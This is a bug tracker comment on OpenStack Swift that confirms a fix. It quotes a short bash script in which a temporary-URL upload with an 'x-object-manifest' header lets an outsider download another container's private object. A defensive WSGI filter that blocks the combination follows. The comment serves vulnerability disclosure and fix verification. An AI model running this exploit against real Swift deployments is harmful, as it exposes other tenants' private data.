Comment 6 for bug 1487450

Timur Nurlygayanov (tnurlygayanov) wrote :

The patch is present on the OpenStack environment, which was deployed by MOS 7.0 ISO #288 RC2.

I found a script that can reproduce the issue in the comments of https://bugs.launchpad.net/swift/+bug/1453948:

    #!/bin/bash
    # resetswift
    set -e
    echo "password" > secret
    swift upload private secret
    swift post -H 'x-account-meta-temp-url-key: mykey'
    # create a container for people to upload stuff to
    swift post public
    # attacker: "yes hello, can I have a safe place to upload some of my data?"
    PUT_TEMPURL_SIG="$(swift tempurl PUT 60 /v1/AUTH_test/public/your-thing mykey)"
    curl -XPUT -H 'x-object-manifest: private/secret' "http://localhost:8080${PUT_TEMPURL_SIG}" -d ''
    # attacker: "oh yes, that data I just uploaded - can I download it please?"
    PUT_TEMPURL_SIG="$(swift tempurl GET 60 /v1/AUTH_test/public/your-thing mykey)"
    # attacker: only... it's not *MY* data - trolrolrololollolo
    echo ""
    echo "**************************************"
    curl "http://localhost:8080${PUT_TEMPURL_SIG}"
    echo ""
    echo "**************************************"

Status changed to Fix Released for MOS 7.0.
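
The script above sends a tempurl-signed PUT that carries an `x-object-manifest` header. One way to refuse that combination in front of the proxy, as an added example that is not part of the original comment and is not Swift's own code: a WSGI filter that assumes the tempurl query parameters `temp_url_sig` and `temp_url_expires`. The class and helper names are hypothetical, and the requests in `status_for` are constructed.

```python
# Added example: a stand-alone WSGI filter, not OpenStack Swift's code.
from urllib.parse import parse_qs

# Query keys that mark a request as tempurl-authorised (assumption stated above).
TEMPURL_PARAMS = ("temp_url_sig", "temp_url_expires")


def is_tempurl_manifest_put(environ):
    """True when a tempurl-signed PUT also tries to set X-Object-Manifest."""
    query = parse_qs(environ.get("QUERY_STRING", ""), keep_blank_values=True)
    uses_tempurl = any(key in query for key in TEMPURL_PARAMS)
    # WSGI exposes the request header X-Object-Manifest under this key.
    sets_manifest = "HTTP_X_OBJECT_MANIFEST" in environ
    is_put = environ.get("REQUEST_METHOD", "").upper() == "PUT"
    return is_put and uses_tempurl and sets_manifest


class RejectTempurlManifest:
    """Hypothetical filter: answer 400 instead of storing the manifest."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if is_tempurl_manifest_put(environ):
            body = b"X-Object-Manifest is not allowed with a temporary URL\n"
            start_response("400 Bad Request",
                           [("Content-Type", "text/plain"),
                            ("Content-Length", str(len(body)))])
            return [body]
        return self.app(environ, start_response)


def _backend(environ, start_response):
    # Stand-in for the object server: accepts whatever reaches it.
    start_response("201 Created", [("Content-Length", "0")])
    return [b""]


def status_for(method, query, headers=None):
    """Run one constructed request through the filter; return the status line."""
    environ = {"REQUEST_METHOD": method, "QUERY_STRING": query,
               "PATH_INFO": "/v1/AUTH_test/public/your-thing"}
    for name, value in (headers or {}).items():
        environ["HTTP_" + name.upper().replace("-", "_")] = value
    seen = []
    RejectTempurlManifest(_backend)(environ, lambda status, hdrs: seen.append(status))
    return seen[0]
```

A PUT without tempurl parameters still passes through, so account owners authenticated by token can keep creating manifests.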